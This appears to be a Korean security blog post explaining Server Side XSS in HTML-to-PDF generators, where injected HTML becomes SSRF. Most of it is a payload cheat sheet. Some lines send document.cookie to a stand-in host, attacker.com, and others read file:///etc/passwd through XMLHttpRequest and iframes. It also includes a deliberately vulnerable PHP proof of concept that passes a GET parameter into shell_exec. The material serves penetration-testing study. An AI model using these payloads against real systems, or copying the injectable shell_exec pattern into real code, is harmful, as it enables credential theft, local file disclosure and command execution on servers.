개요
특정 페이지 내 코드가 HTML로 렌더링 되어 PDF로 반환되는 페이지가 있습니다. 만약 사용자 입력 값을 해당 페이지에 삽입할 수 있고 HTML 코드로 인식된다면 해당 취약점은 XSS이면서 SSRF(Sever Side Request Forgery)가 될 수 있습니다. 그리고 이러한 취약점을 Server Side XSS라고 부릅니다.
※ PDF로 반환되는 기능에서만 발생하는 건 아니지만 제일 많이 발생하는 유형이라 PDF를 기준으로 설명하겠습니다.
Cheat Sheet
Confirm Server Side XSS Code
<img src="x" onerror="document.write('test')" />
<script>document.write(JSON.stringify(window.location))</script>
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>
Confirm Server Side Blind XSS Code
<img src="http://attacker.com"/>
<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
<script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
<link rel=attachment href="http://attacker.com">
Leaked Server URL
<img src="x" onerror="document.write(window.location)"/>
<script> document.write(window.location) </script>
LFI(Local File Inclusion) - When the server url sheme is file://
<script>
var x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///etc/passwd");x.send();
</script><script>
var xhzeem = new XMLHttpRequest();
xhzeem.open("GET","file:///etc/passwd");
xhzeem.send();
xhzeem.onload = function(){document.write(this.responseText);}
xhzeem.onerror = function(){document.write('failed!')}
</script><iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
PoC(Proof of Concept)
취약 코드
<?php
require_once('/usr/share/php/tcpdf/examples/tcpdf_include.php');
function jsrender(){
$script = __DIR__."/content.js";
$cmd = "phantomjs content.js";
$output = shell_exec($cmd);
return $output;
}
if($_GET['html']){
$cmd = $_GET['html'];
shell_exec("echo '$cmd' > temp.html");
$html = jsrender();
header("Content-type: application/pdf");
header("Content-Disposition: inline; filename=filename.pdf");
@readfile('test.pdf');
}else{ $html = "<h3>Hello World</h3>";}
?>
Confirm Server Side XSS Code : <h1>123</h1>
Leaked Server URL : <script>document.write(window.location.href);</script>
Access Denied Bypass : <iframe src="/wordpress/wp-admin/"></iframe>
Server Side XSS 1-Day 취약점
MicroStrategy SSRF through PDF Generator (CVE-2020-24815) | Triskele Labs
Extracting your AWS Access Keys through a PDF file. An innocuous “Export to PDF” function can be an open door to your organisation’s internal network
www.triskelelabs.com
'Hack > Web' 카테고리의 다른 글
| CSP(Content-Security-Policy) Bypass (0) | 2022.06.15 |
|---|---|
| 인증(Authentication)과 인가(Authorization)의 차이 (0) | 2022.06.02 |
| [CVE-2017-5487] WordPress REST API 1-Day 취약점 (0) | 2022.05.17 |
| postman을 활용한 API 진단 시 유용한 스크립트.zip (0) | 2022.05.11 |
| Cross Site Request Forgery(CSRF) payload (0) | 2022.05.06 |
댓글